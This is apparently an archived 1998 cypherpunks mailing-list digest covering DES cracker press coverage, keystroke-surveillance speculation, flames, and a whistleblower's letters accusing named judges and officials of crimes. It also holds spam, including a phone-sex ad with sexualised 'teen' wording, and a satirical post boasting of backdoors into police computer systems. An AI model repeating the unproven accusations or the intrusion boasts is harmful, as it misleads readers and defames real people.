Subject: Re: ZDTV and CNN coverage of DES Cracker
Message-ID: <3.0.3.32.19980719114335.0079eb20@mail.castle.net>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sat, 18 Jul 1998 22:06:31 -0400
>To: John Gilmore <gnu@toad.com>
>From: "John D. Hays" <@>
>Subject: Re: ZDTV and CNN coverage of DES Cracker
>In-Reply-To: <199807180011.RAA02044@toad.com>
>
>At 05:11 PM 7/17/98 -0700, you wrote:
>>ZDTV will have me on the 8PM news tonight, and Barry Steinhardt on
>>their "Silicon Spin" program today.
>>
>>CNN took pictures earlier today, I don't know when they'll use them.
>>
>
>	Congratulations to you and the EFF. I caught some of Silicon Spin.
Everyone seemed to agree that DES was weak and the government is going
about things all wrong.  But CNN doesn't get it.
>
>To paraphrase:
>"A popular method of scrambling data was dealt a blow today... by a
specially built cracking machine... a BANKER was quoted as admonishing
these efforts as reckless for it will only benefit _criminals_."
>
>	I don't remember it verbatim but I remember the impression I got from
CNN.  Now, this was only a news brief, not a report or a panel, but it
illustrates the ignorance (or bias) of big media.
>
>	They never said "encryption". Instead referring to it as "method of
scrambling data".  Encryption is a geeky Big Word that CNN thinks normal
people won't know.  They completely ignored the social and political
implications of cracking DES.  Using encryption to secure your
correspondence, for authentication, or to protect Freedom and Liberty are
geeky Big Concepts that CNN thinks normal people won't understand.  
>
>	Now I don't expect an in-depth report on a complex issue in thirty
seconds.  But to completely ignore the real issues and give us a half assed
uncited falsehood?  Did anyone see any good coverage of the DES crack on
CNN, ABC, NBC or any other big corporate news program?
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@m7.sprynet.com>
Date: Sun, 19 Jul 1998 14:20:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: IDEA chip evaluation?
Message-ID: <3.0.5.32.19980719142031.007c2d60@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



Anyone actually received the IDEA chip eval board from ASCOM?
How long does this take?



honig@alum.mit.edu
	
	Speech is not protected simply because we write it in a language
		Federal	Judge Gwin on the Bernstein case









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lisa@yahoo.com
Date: Sun, 19 Jul 1998 08:21:50 -0700 (PDT)
Subject: HOT FREE PHONESEXrere
Message-ID: <199807191527.PAA15081@uecnet.uecnet.com>
MIME-Version: 1.0
Content-Type: text/plain


hi baby!

CALL +1-(767)-445-2199 For HOT HOT PHONE SEX!!!

Get Off With Our Live Teen Sluts,

HOT ORGY PHONE SEX!

CALL OUR FREE PHONE SEX SERVICE NOW! 24 hrs / 7 Days

NO CREDITCARD, 100% FREE!!

Don't Make Me WAIT! CALL NOW!

CALL +1-(767)455-2199 NOW!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JackeI466@aol.com
Date: Sun, 19 Jul 1998 13:19:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: send me the book
Message-ID: <c0f50d72.35b254a2@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


send me the book (e/mail me back




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sun, 19 Jul 1998 10:57:34 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Tit's a victory: Twany Peaks not a boob basher/White House zombie sex
Message-ID: <19980719170949.16692.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/19/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "kryz" <chrisharwig@hetnet.nl>
Date: Sun, 19 Jul 1998 09:36:18 -0700 (PDT)
To: "Ciferpunx" <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <MAPI.Id.0016.0072797a202020203030303430303034@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain



hQEMAw0xW9bpUfQRAQgAjPWC/fQ0S9OllvrvE3LXM2avlc0TyhJlu25PGZBV7Gva
KsnbzE3dAh9fYc6oHg6CGAgYZDbVU/gK0s/v7j3Skri10L63A/YnxdqVd1LMJIzb
9ozXbZl+nAu5ocbEvOvs1YJGBLXkadHePzzpDEhW0ijDBJGeNnU8dlfnPhQZLTJj
s+NcjTPE1bX0Vsz3Z6kG/Joo0xDLZz4lxq0LW98UFaCy3zHV0Zs0HimEIx7pd/kw
hKiK8R7OU9lL/P8kOfNIF73ij8+bGV+aMj1zDLfHV2DMOin4qrmOy0LMqv5v36TX
iMc7Q6XZfZLis7t817/Xvw5IvPzG1iSnhC9g/RV9HaYAAAEL/2lnKxiBaV3eyYsh
rKaJ7DN4KRISePHuTCUgpyp1y1f2yH/6RkttlLqKGdcKu1seo9EDaliCr0BA5MXW
rhwMoXVtCnZJY1htRZuOLOfCbFHIQ7eeBfhff8l3mWKHCrAsgNgXAVVtFNAVOgHY
np9KdGOgcs7iRBVuoBNnFGCXDOXyCSxvwKbIIegCPwYXvt4FNkVY69gbKQbJyi0E
hqDPU+ESRqlTzZ82RM8lvxRFfEbWJ4OgqQU2E4Y80gxCHUVcFJZ9nhvqm77pxvcO
YCLLjtcLeyZd40a5xzMn8szFTx1J4EXsmlpmQ2mB0+4xdLTGmBmtwPQiR/fzsspT
cnQCq1lpQMYygBMmmF8j
++U59







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Sun, 19 Jul 1998 12:29:13 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: Covert Access to Data and ID
In-Reply-To: <199807081547.LAA21623@camel14.mindspring.com>
Message-ID: <Pine.BSF.3.96.980719183027.2251C-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



    there is no such word as "can not" in terms of covert surveillance;
    however, if the method is to be universal, the gubmnt will need to

    1.  enforce drastic standardization of hardware systems if the 
	logging functions are to be effective. 

	    this might Intel rather happy and Intel is the type of
	    organization which would perform the function with glee,
  	    if they are not already developing it.  for instance,
	    I just installed a ATX-BX-AGP motherboard which consists
	    of a "few" VLSI support chips for the SLot 1 processor:
	    PCI, PCI to ISA, IDE, USB, and power management  (5 chips,
	    all Intel) plus adaptec SCSI and Intel's 100M ethernet.

	    it would be easy enough to embed the keystroke function
	    since the PC98 spec calls for total implementation of the
	    USB controlled.  

    2.  enforce drastic standardization of operating systems to support
	the hardware --which makes MickeySnot ideal in so much as they
	do not publish source code.

	    my question would be whether or not Gate$ was doing the
	    SIGINT or the government. embedding WIPO is a wet dream
	    on the part of the same publishers which are trying to
	    ram home the draconian M$ software license in the UCC
	    revisions up for vote in Cleveland later this month.

	    why M$?  they are almost universal.
 
	    I, for one, refuse to run _anything_ branded by
	    Gate$ encroaching sloth --never have, never will. I can see
	    the government trying to slip their code into freeBSD
	    distributions --welcome to the anarchists...  likewise,
	    Linux, netBSD, BSDI, etc. and, I would say the government's
	    interest is significantly more advanced for the known
	    dedicated hackers, operating systems tweakers, and other
	    assorted non-conformists who do not subscribe to M$.

	    bottom line is a proprietary OS --and getting everyone to
	    run it --good luck, other than by unenforcable fiat; there
	    will be ways to circumvent any clamp although the feds will
	    certainly thin our ranks.

    3.	provide some means of transparently piggy-backing the information
	(presumably in raw form) on the network.

	    again, the cooperation of the operating system is required;
	    not everyone is on line, and many connections are slow. if the
	    data collection is limited to keystokes only, the data require-
	    ment is relatively low, but the holding tank is still required.

	    the alternative is to short range transmit the information
	    and wire the neighborhoods with the receivers.  one of their
	    objective is to have everyone instantly "tappable".

    4.  establish data collection centers

	    60 million current net users --consider the data quantity

    5.  establish prescreen and select for analysis data processing

	    consider the intelligence required

    6.  analysis software

	    NSA may try to scan all international traffic in real time
	    with key word recognition, etc. but keystroke, including
	    dealing with editing, mistakes, corrections, etc, which
	    confuse the input?

    bottom line:  we aint there yet.  however, a van outside in the
    street can pick up the signals from hundreds of machines. 

	[  lost most of my recent files on a tape crash --there was 
	   a project at OxBridge which generated hash interferance 
           which made scanning rather difficult - more effective than
	   Tempest --can anyone refresh the pointer? ]

    there is no question the government expects intrusive technology. the
    burrow-critters are running on high-octane paranoia and they intend
    to preserve the status quo of governing without our consent.  their
    historical means of controlling the news is running out of headroom;
    the internet gossip lines are faster than their reaction times.

    I certainly would not want to say the feds could not initiate and/or
    enforce any or all of the above requirements, but there is a point
    where even the American sloths will rise up and start the process
    of creating martyrs for the cause.

    a more probable approach is to limit the desemination of information
    by "known" opponents of government actions (trivial by blocking their 
    network access once the control the ISPs; and 

    maybe a few high profile trials with lead jacket incarcerations to 
    scare off some of the less vociferous (dont say they cant jail us all).

    lastly, I look at it this way: for every measure, there is a counter-
    measure. if I can not determine the existence of SIGINT transmissions
    from my hardware/software, I'll be hanging up my spurs.  after all,
    listening to gubmnt propoganda in both ears is redundent, who needs it?

    	attila out...

   _________


On Wed, 8 Jul 1998, John Young wrote:

>Dave Emery's remarks on government access to
>keystrokes (proposed by the NYT as an alternative
>to GAK) points to the probable increase of intrusive
>devices to counter increasing use of encryption
>and other privacy and anonymity measures.
>
>This topic comes up here now and then, with
>mentions of a slew of methods to protect privacy of 
>data during transmission or storage. But the possibility
>of logging the initial creation or manipulation of data is
>not as often discussed, nor how to tie a person to
>the data, as now being asked in legal and law
>enforcement fora to identify, catch, convict and
>jail computer culprits.
>
>That the NYT floated the idea surely means someone
>is testing public response to an idea that seems to
>be more intrusive than GAK: the logging of initial
>data and any manipulation of it, prior to encrypting,
>and maybe including a means to link the actions to
>the user.
>
>If this is logging (and related retrieval) is done covertly, 
>encryption could thereby become a falsely reassuring 
>cloak of privacy.
>
>Dave thinks devices like these are surely in the works,
>and he can say more about their sponsors, technologies 
>and implementations.
>
>One driving force, as he previously noted, is the desire
>for devices to assure copyright protection, backed by the 
>WIPO treaty, which now being considered for approval. 
>See the House report on it at:
>
>   http://jya.com/hr105-551.txt  (141K)
>
>And the EFF and ACLU opposition to it:
>
>   hr2281-opp.htm
>
>Other forces, though, are employers who want to snoop,
>law enforcement, government, marketers, actually the
>same groups who dislike privacy protection measures,
>but often prefer to snoop covertly while loudly proclaiming
>support for privacy.
>
>Thus, the more general question Dave has raised is how
>widespread is the development and implementation of
>technolgies for covert surveillance on the Web and in 
>desktop boxes -- happily spreading quietly while attention 
>is focussed on the very encryption which it will circumvent?
>
>And what are these devices, or what might they be, what 
>might be countermeasures and who might be working for 
>and against them. SDA must have insights to share.
>
>Over to Dave Emery and those more knowledgeable. 
>
>For those who missed his earlier message we've put it, with a 
>follow-up at:
>
>   http://jya.com/gaks-de.htm
>
>
>

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sun, 19 Jul 1998 04:35:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Request To Be Phlamed
In-Reply-To: <419.435994.48982095GayWeb@GayWeb.Net>
Message-ID: <3.0.5.32.19980719203408.00838a50@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 AM 18 07 98 -0700, GayWeb.Net wrote:
>Hi Guys

GO THE FUCK AWAY. NOW.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rahsaan Young <ceoyoung@mail.atl.bellsouth.net>
Date: Sun, 19 Jul 1998 20:42:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: magic codes
Message-ID: <35B2BC74.3662@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain


looking for magic codes for cellphones know of any please send




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Masterweb@mail.kc.net
Date: Mon, 20 Jul 1998 00:10:13 -0700 (PDT)
To: Masterweb@mail.kc.net
Subject: AGGRESSIVE INVESTING
Message-ID: <<199807160000.UAA01620@sdanet.org>
MIME-Version: 1.0
Content-Type: text/plain


Announcing - 

An exciting, new service that will provide you with 

information on dynamic new companies that have just 

gone public and could very well become tomorrows 

hot stocks.  There is no cost or obligation - - all 

we need is your e-mail address.  To start your FREE 

subscription call this toll-free 24 hour phone 

number now and leave your e-mail address on the tape:

800-935-5171 extension 3157





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 20 Jul 1998 01:34:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: BackDoors - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C9707.23105320.3@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've Got BackDoors Coming Out My AssHole! - SAHMD!!!
____________________________________________________

  I am not a sick, degenerate asshole who likes to beat up
people in wheelchairs, although I have been known to kick
the ass of a one-armed man, given the fact that he may well
be the guy who murdered Richard Kimble's wife...
  Thus, I feel it incumbent upon myself to give an honest
account of my life of crime, so that the Law Enfarcement
Offals and Persecuting Attorneys who have, so far failed 
miserably over the years in bringing me to Officially
Recognized Justice (TM), will have a fighting chance of
throwing my sorry ass in a dark hole until Hell freezes
over, by portraying me as the sorry, pathetic, psychotic,
monstrous, criminal, scum-bag piece of shit that I am, in 
Reality (TM).

  First, however, I would like to insert an totally upaid
advertisement for the DigitalRainbowRevolutionaryFamily
gathering at the Plaza Hotel in Lost Wages at the end of
July (I think).
  It's some kind of hacker's conference (I think), and they
have a Spot The Narc (or somesuch) contest (I think) during
the conference.
  I have all the details on a faded copy of an email to
the CypherPunks list that I printed out, but all of my
valueable research material is currently fused together,
due to it being hastily thrown into the back of my truck,
and then rained on, during my Fright From Fleedom Japanese 
Toulist Tlap that was inspired by my receiving indications 
that the abundant overgrowth that Government Authorities 
intended to mow down was not, as I had thought, in my back 
yard, but on my butt. [WAS: Stick Around, Pal, And our Ass 
Is Grass!]

  Anyway, despite the fact that I cannot even remember
the proper name or date of the conference (although I
have no problem remembering the name of the Plaza Hotel,
since it is the home of the Penny Slot Machines which
enable one to gamble feverishly for hours with the 
loose change they have scraped off the floor of their
vehicle, after having lost all the money they got by
pawning their grandmother's wedding ring), I have made
arrangements, during my recent Soft Kmart Tour Of
America, to have the winner of the conference's Spot
The Snark contest awarded a highly polished and fully
functional BackDoor into the Royal Canadian Mounted
Police computer system.
  The award, to be presented by the Offical Mascot of the
Spot The Snark contest, "Spot, the Snipe," unfortunately
does not have the immense value that one might think,
since it has been devalued by the recent proliferation
of a large number of BackDoors into Canadian Government
computer systems. Nonetheless, it will undoubtedly be
the source of countless hours of entertainment for the
lucky winner.

  The award to be presented in Lost Wages has officially
been named the 'Jim Bell InterNetional Back Door Revenge
Scholarship To The School Of Hard Knocks Cafe."
  It is an Army of Dog Scholarship meant to impress on
the Controllers that PayBack, like Oppression, has now
entered the Global Information Monitoring Age, and that 
the New Secret Squirrel Disorder is alive and well in 
ButtFuck, Canada.
{ If you can't fuck the one that fucked you, fuck someone
 that fucked someone else, and vice-versa, ad infinituum.}

  In short, any ShortLimpDickedPrick in ButtFuck, Canada,
can no longer be certain that HisOrHer violation of both
the laws of the land and the laws of human decency will
go unpunished, or that the Anonymous Avenger will not be
an entity totally unknown to them, from a distant place
such as Seattle, with little known connection to the
time and place of a monstrous crime against Monstrous
Oppressors. 
And, on the other hand (which has warts), when strange 
things begin to happen in the Seattle Court computer 
system, strangely connected to the StrangeButTrue! 
persecrotchion of a StrangeBedFellow of the Author,
James C. "The 'C' Stands For Dalton" Bell, the only
thing that Sharon can guarantee in Stone, is that the
obvious suspects at ASIX, the adopted parents of the
Author's SparCard II, have absolutely nothing to do
with the eerie laugh of Vincent 'Cate' Price echoing
through their system, since the Army of Dog doesn't
shit in it's own back yard (although it sometimes
pees in its kitchen sink, when the oung is occupied).

  In honor of the Royal Rogers Stuffed & Mounted Police 
currently celebrating their 150th birthday, I recently 
decided to present them with the ultimate gift.
  Realizing that I was far from alone in my position of
never being convicted of something I was actually guilty
of (we may not be guilty of breaking the law, but we are
all guilty of *something*--that's in the Bible, I think),
I came to the conclusion that the perfect birthday present
to the RCMP, on the occasion of being awarded their 150th 
consecutive 'Fascist Oppressor With The Best Public Image
Award,' would be to hand them my head on a silver platter,
enabling them to convict me on a charge of which I am
completely innocent (from a technical, legal standpoint),
and provide them with all of the information necessary
to ensure my Public Labelization (I won a game of Scrabble
with that word, once) as an Officially Recognized Monster,
as seen on 'Cops,' '60 Minutes,' 'Canada's Least Wanted,'
and 'World's Slowest Police Chases: The Return Of Beyond
The Valley Of The Planet Of Al Cowling.'

  I had originally intended for my gift to the RCMP to be
a professional, polished MultiMedia Entertainment Special,
but, since the thieving fucks stole my Toshiba Tecra in 
order to attempt to shut me the fuck up, I am forced to
hoist myself on my own petard in a strictly ASCII computer
environment (without a spell checker or thesaurus, so there
is little likelihood of my being able to discover, through
inference, what a petard actually is, or whether I have
spelled it ccoorreeccttllyy).
  Accordingly, the passages of the following chapters which
will describe in perverse, grotesque and disgusting detail
the nature of my crimes against sexual normality, will *not*
be accompanied with graphic, color illustrations, leaving 
the reader to use their own imagination, or to pay $ .01 per
minute by dialing 1-800-EAT-T0T0, to hear a heavy-breathing
tape-loop which provides excellent background stimulation
for the sexual imagination, as long as you can ignore the
fact that it is the tape of the Author, a sex-pack a day
chain-smoker, climbing a single flight of stairs.

  In the following chapter, the Author, still suffering
under the delusion that someone, somewhere, is reading
this tripe (besides college students attempting to gain
extra credits in a summer session psycho-ology class
titled, "An Analysis Of The Results Of Extensive Brain
Damage Caused By MKULTA Experiments On The Half-Unwitting
Author--Current Technology Cannot Detect Any Difference"),
provides complete details of HisOrHer first annual major
drug-deal, just as Canadian Authorities always suspected,
but could never prove.

Smoke 'em if you got 'em...
[ou may leave a message for the Author, at the sound of
 the Bong.]

  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: customerservice@amesperf.com (Customer Service)
Date: Sun, 19 Jul 1998 23:07:34 -0700 (PDT)
To: CYPHERPUNKS@toad.com (Lacey Hawkins)
Subject: Ames Performance Engineering: Catalog
Message-ID: <199807200604.CAA13057@crossroads.monad.net>
MIME-Version: 1.0
Content-Type: text/plain


On Monday, July 20, 1998 at 02:04:27 you responded to our Catalog form.

Thank you for requesting our catalog
Regards,
Customer Service
mailto:customerservice@amesperf.com
---------------------------------------------------------------------------
Ames Performance OnLine - http://www.amesperf.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 20 Jul 1998 07:40:30 -0700 (PDT)
To: senator@torricelli.senate.gov
Subject: USCA and Out of Order
Message-ID: <35B3557F.152D@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Monday 7/20/98 8:07 AM

John Young

Saw Payne/Morales v. NSA: Response to USCA Orders     July 19, 1998

http://www.jya.com/whp071598.htm

Thank you and your helpers for all of the scanning work.

Morales and I talked on the phone last night about the next step.

We are going to move on the criminal privacy act violation. 
http://www.jya.com/snlhit.htm

Ninth Circuit judge Proctor Hug has not responded.

However, Ninth circuit Senior Case Expiditer Gwen Baptiste returned
my complaint.

This, of course, has earned Baptiste a criminal complaint affidavit to
be filed with Hug again.

Morales was very insistant last night about the seriousness about the
judiciary not doing their jobs.

Reason is that improper handling of valid complaints can lead to
frustrated
citizens - some of who might resort to socially unacceptable expressions
of
displeasure towards the judiciary.  

Like ARTICLES RELATED TO OKLAHOMA CITY BOMBING seen at
http://www.aci.net/kalliste/

Morales and I believe in using the law to fix the problem - now with
some
help from congress.

A Washington DC DOI whistleblower pointed me to the book,

  Out of Order : Arrogance, Corruption and Incompetence on the Bench - 
  Max Boot;       Hardcover

http://www.amazon.com/exec/obidos/ASIN/0465054323/o/ref=qid_900944492/002-2724971-2249850

I read the Forward by Bjork on Friday afternoon.

I sure wish we could avoid unpleasantness I see coming by getting this
matter SETTLED.

Later
bill


Friday 5/1/98 9:48 AM
 
Certified   Return receipt requested

Cathy A Catterson, Clerk
Ninth Circuit Court of Appeals
121 Spear Street
POB 193939
San Francisco, CA 94119-9800
415 744 9800
 
Dear Clerk Catterson:

Purpose of this letter is to discover the REASON the criminal complaint 
addressed to Ninth circuit judge Proctor Hug  Jr dated Wednesday  4/1/98  11:02 AM was
returned to me WITHOUT COVER LETTER.

I attach a copy of the envelope the above material was enclosed.  

Return address is

	CLERK, U.S. COURT OF APPEALS
	P.O. BOX 547
	SAN FRANCISCO, CA 94101-0547

	OFFICIAL BUSINESS
	PENALTY FOR PRIVATE USE, 300

Postmark is SAN FRANCISCO, CALIF  APR 24 98 U.S. POSTAGE $2.62
METER 504753.

The envelope is hand-addressed and stamped CONFIDENTIAL.

Since no cover letter was enclosed to explain the return of what I believe is
both a valid and lawful criminal complaint affidavit supported by WRITTEN
EVIDENCE, some even in FILED court documents, I feel we must investigate
to discover the REASON.

All of the accused are federal employees or contractor employees.

Possibility exists that return of the enclosed criminal complaint affidavit without
cover letter stating the REASON may indicate violation of Title 18

   1512. Tampering with a witness, victim, or an informant 

  [(b)]  Whoever knowingly ...  corruptly persuades another  person, or  attempts to do so, or engages in 
misleading conduct toward another person, with intent to -  ...
 
  (2) cause or induce any person to - 
     (A) withhold testimony, or withhold a record, document, or other object, from an 
           official proceeding; ...
  (3) hinder, delay, or prevent the communication to a law enforcement officer or judge of the United     
        States of information relating to the commission or possible commission of a Federal offense ...
        shall be fined under  this title or imprisoned not more than ten years, or both. 
   (c) Whoever intentionally harasses another person and thereby hinders, delays, prevents, or dissuades any    
           person   from - ...
    (2) reporting to a law enforcement officer or judge of the United States the commission or possible
          commission of a Federal offense ...  or attempts to do so, shall be fined under this title or imprisoned not 
          more than one year, or both. 

Clerk Catterson, you may be aware  that under  1512

  (d) In a prosecution for an offense under this section, it is an affirmative defense, as to which the defendant   
  has the  burden of proof by a preponderance of the evidence, that the conduct consisted solely of lawful 
  conduct ...

Therefore, I ask that you investigate to discover WHO returned the enclosed criminal complaint affidavit to 
me.

And report the REASON the criminal complaint affidavit was returned to me.

I ask that you respond within 30 days.

Sincerely,



William H. Payne
13015 Calle de Sandias NE
Albuquerque, NM 87111



Wednesday  4/1/98  11:02 AM

Certified   Return receipt requested

Proctor Hug  Jr
Chief Judge, Ninth Circuit
50 West Liberty 
Street
Reno, NV 89501-1948
(702) 784-5631
784-5166 fax


Dear judge Hug:


Purposes of this letter-affidavit are to file criminal complaint affidavits against

1  judge Marilyn Hall Patel for not properly processing a  criminal  violation of the Privacy Act, 

2  former Ninth Circuit chief judge J Clifford Wallace for not properly  processing criminal complaint affidavits for

    a  felony perjury violation by Sandia National Laboratories lawyer  Gregory Cone,

    b  judge Fern Smith for not properly processing a felony perjury  violation by Sandia National Laboratories    
      lawyer Gregory Cone. 

    c  Albuquerque FBI special agent in charge Thomas Kneir for sending  FBI agents Kohl and Schum to my 
        home in an attempt to intimidate me from exercising my civil rights.
   
    d  Margret D. Thomas, Judicial Assistant to the Honorable Marilyn Hall  Patel, for not forwarding a valid 
        criminal complaint affidavit  regarding a criminal violation of the Privacy Act to Patel.

Brief history would be valuable for your understanding of this matter.

  Sandia has long been involved with the security of America's nuclear  arsenal. As they announce on their website: "We are funded primarily by  the U.S. Department of Energy to design all the non-nuclear opponents of  the nation's nuclear weapons" 
   
http://www.sandia.gov/">http://www.sandia.gov/</a>). 

  This includes the cryptographic locks used to secure the nukes.  

  NSA supplies the algorithms and implementation guidelines to Sandia.  
  
http://www.aci.net/kalliste/nukearse.htm

In about 1982 I became project leader of the Missile Secure Cryptographic Unit [MSCU].

The MSCU was funded by the National Security Agency [NSA].

As a result of my about 4 year work with NSA, I was given access to its cryptographic algorithms by one document and many electronic schematics.

I wrote a book

            ISBN: 0125475705
            Title: Embedded Controller Forth For The 8051 Family
            Author: Payne
		Cover: Hardback/Cloth
            Imprint: Academic Press
            Published: September 1990

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

about the software technology we used for the MSCU.

In 1986 I transferred to build the data authenticator for the Department of Energy's Deployable Seismic Verification System [DSVS]for the Comprehensive Test Ban Treaty [CTBT].

NSA liaison for the DSVS/CTBT project offered information to me that NSA regarded former president Reagan as one of the US's foremost traitors for the reason  

  First, U.S. President Ronald Reagan informed the world on national television that the United States was     
  reading Libyan communications.  This admission was part  of a speech justifying the retaliatory bombing of 
  Libya for  its alleged involvement in the La Belle discotheque   bombing in Berlin's Schoeneberg district, 
  where two U.S.  soldiers and a Turkish woman were killed, and 200 others  injured. Reagan wasn't talking 
  about American monitoring of   Libyan news broadcasts. Rather, his "direct,  precise, and  undeniable proof" 
  referred to secret (encrypted) diplomatic  communication between Tripoli and the Libyan embassy in East 
  Berlin.

http://www.aci.net/kalliste/speccoll.htm

which is further explained at http://caq.com/CAQ/caq63/caq63madsen.html

  It may be the greatest intelligence scam of the century: For decades, the US has routinely intercepted and
  deciphered top secret encrypted messages of 120 countries.

In early 1992 a Sandia labs director decided that he and his subordinates were going to enter the data authentication business.

The director transferred me to break electronic locks for the Federal Bureau of Investigation.  

This work was funded by the FBI/Engineering Research Facility [FBI/ERF], Quantico, VA.

I ordered about $200,000 of the FBI/ERF's money buying two copies of electronic locks.

One lock I ordered was the Hirsch Scramblepad electronic lock.

In about 1991 I was following progress of lawsuits in the district of Northern California,

  The first two cases to directly address the issue of  intermediate copying both originated in California's
  Northern District Court.  They are Atari v. Nintendo and  Sega v. Accolade.  In both cases, the district court 
  found that intermediate copying was NOT fair use.

  [The New Use of Fair Use:  Accessing Copyrighted Programs Through 
  Reverse Engineering, Stephen B. Maebius, Journal of the Patent and 
  Trademark Office Society, June 1993, 75, n6, p433]

Judge Fern Smith presided in both cases.

Reason I was following Atari v Nintendo was that I my Forth book I have two chapters on reverse engineering software.

One chapter contains a computer program which copied a ROM BIOS to diskette.

Smith's decisions made my intermediate copying program illegal.

  In a strong opinion she [Fern Smith] wrote in March 1991,  when granting Nintendo's request for a           
  preliminary  injunction against Atari, she lambasted Atari's lawyers for  thievery.

I was given the job assignment to copy the ROMs of Hirsch's 8051-based Scramblepad electronic lock to reverse engineer them to hopefully allow me to modify the locks for allow surreptitious entry.

I refused to engage in illegal activity for the FBI.

The termination letter seen at http://jya.com/whpfiles.htm states

  This is to advise you that effective July 27, 1992, you  will be terminated from Sandia National Laboratories.   
  This action is the results of your flagrant attack on a valued   Sandia customer and repeated insensitivity to 
  security/classification requirement.  These acts violate   Sandia National Laboratories Code of Conduct, 
  specifically  the Personal Conduct section,, and the Safeguarding  Information and Records Section. ...

for my whistleblowing SAND report on the National Security Agency's deficient work and refusing to mark classified on a report I and Danny Drummond wrote on how to fake Wiegand Wire access entry credentials for the FBI.

Both I and my EEOC complaint officer Ray Armenta were never able to determine exactly why I was fired.

However March 22, 1997 I received copies of the enclosed

  1  April 15, 1994 letter to EEOC director Charles Burtner  from Sandia Diversity Leadership director 
      Michael G. Robles.

  2  July 27, 1997 Termination of Employment memorandum containing my signature.

  3  DISCIPLINARY REVIEW COMMITTEE MINUTES, July 16, 1992.

  4  DISCIPLINARY REVIEW COMMITTEE MINUTES, July 6, 1989.

  5  September 6, 1995 letter from EEOC Investigator Larry J. 
     Trujillo to Richard Gallegos.

from Sandian Richard Gallegos.

Sandia lawyer Harold Folley previously stated that no documents existed.

The Privacy Act states

  (d) Access to Records.--Each agency that maintains a system
  of records shall--
            (1) upon request by any individual to gain access
        to his record or to any information pertaining to him
        which is contained in the system, permit him and upon
        his request, a person of his own choosing to accompany
        him, to review the record and have a copy made of all
        or any portion thereof in a form comprehensible to him,
        except that the agency may require the individual to
        furnish a written statement authorizing discussion of
        that individual's record in the accompanying person's
        presence;

The Sandia Disciplinary Review Committee NEVER interviewed me to check the veracity of their statements.

The Privacy Act states

  (2) permit the individual to request amendment of a record pertaining to     
  him and--

The statements in the SDRC are incorrect. I followed all Sandia procedures known to me.  I did nothing wrong.

I had no opportunity to defend myself.  My rights guaranteed under the Constitution, Bill of Rights, Article XIV.

  Section 1. All persons born or naturalized in the United States, and   
  subject to the jurisdiction thereof, are citizens of the  United States  
  and of the State wherein they reside. No State shall make or enforce any 
  law which shall abridge the privileges or immunities of citizens of the 
  United States; nor shall any State deprive any person of life, liberty, 
  or property, without due process of law; nor deny to any person within 
  its jurisdiction the equal protection of the laws.

have been violated.

C My permission was never asked to release these records to Gallegos.

As you may realize about the Privacy Act

  (b) Conditions of Disclosure.--No agency shall disclose any
  record which is contained in a system of records by any means
  of communication to any person, or to another agency, except
  pursuant to a written request by, or with the prior written
  consent of, the individual to whom the record pertains ...

The Privacy Act allows imposition of criminal penalties for those like members of the SDRC, Robles, Burtner,  and Trujillo who 

  (i)(1) Criminal Penalties.--Any officer or employee of an
  agency, who by virtue of his employment or official position,
  has possession of, or access to, agency records which contain
  individually identifiable information the disclosure of which
  is prohibited by this section or by rules or regulations
  established thereunder, and who knowing that disclosure of the
  specific material is so prohibited, willfully discloses the
  material in any manner to any person or agency not entitled to
  receive it, shall be guilty of a misdemeanor and fined not more
  than $5,000.
    (2) Any officer or employee of any agency who willfully
  maintains a system of records without meeting the notice
  requirements of subsection (e)(4) of this section shall be
  guilty of a misdemeanor and fined not more than $5,000.

